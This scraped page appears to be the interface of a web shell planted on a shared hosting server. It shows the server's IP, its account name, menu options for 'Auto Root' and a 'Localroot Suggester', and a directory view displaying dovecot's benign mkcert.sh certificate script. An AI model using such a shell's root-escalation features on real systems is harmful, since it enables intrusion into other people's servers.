Linux res4.skyhost.pk 4.18.0-553.158.1.el8_10.x86_64 #1 SMP Wed Aug 26 03:18:33 EDT 2026 x86_64
LiteSpeed
Server IP : 65.109.66.33 & Your IP : 216.73.217.126
Domains : 334 Domain
User : supercareproduct
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
dovecot /
Delete
Unzip
Name
Size
Permission
Date
Action
example-config
[ DIR ]
drwxr-xr-x
2026-04-21 01:18
sieve
[ DIR ]
drwxr-xr-x
2026-04-21 01:18
dovecot-openssl.cnf
496
B
-rw-r--r--
2025-10-29 06:58
index.html
382
B
-rw-r--r--
2026-02-03 19:32
mkcert.sh
866
B
-rw-r--r--
2026-02-03 19:32
solr-config-7.7.0.xml
11.24
KB
-rw-r--r--
2025-10-29 06:58
solr-config-9.xml
31.09
KB
-rw-r--r--
2025-10-29 06:58
solr-schema-7.7.0.xml
3.95
KB
-rw-r--r--
2025-10-29 06:58
solr-schema-9.xml
2.23
KB
-rw-r--r--
2025-10-29 06:58
thread-refs.txt
8.6
KB
-rw-r--r--
2025-10-29 06:58
Save
Rename
#!/bin/sh # Generates a self-signed certificate. # Edit dovecot-openssl.cnf before running this. umask 077 OPENSSL=${OPENSSL-openssl} SSLDIR=${SSLDIR-/etc/pki/dovecot} OPENSSLCONFIG=${OPENSSLCONFIG-dovecot-openssl.cnf} CERTDIR=$SSLDIR/certs KEYDIR=$SSLDIR/private CERTFILE=$CERTDIR/dovecot.pem KEYFILE=$KEYDIR/dovecot.pem if [ ! -d $CERTDIR ]; then echo "$CERTDIR directory doesn't exist" exit 1 fi if [ ! -d $KEYDIR ]; then echo "$KEYDIR directory doesn't exist" exit 1 fi if [ -f $CERTFILE ]; then echo "$CERTFILE already exists, won't overwrite" exit 1 fi if [ -f $KEYFILE ]; then echo "$KEYFILE already exists, won't overwrite" exit 1 fi $OPENSSL req -new -x509 -nodes -config $OPENSSLCONFIG -out $CERTFILE -keyout $KEYFILE -days 365 || exit 2 chmod 0600 $KEYFILE echo $OPENSSL x509 -subject -fingerprint -noout -in $CERTFILE || exit 2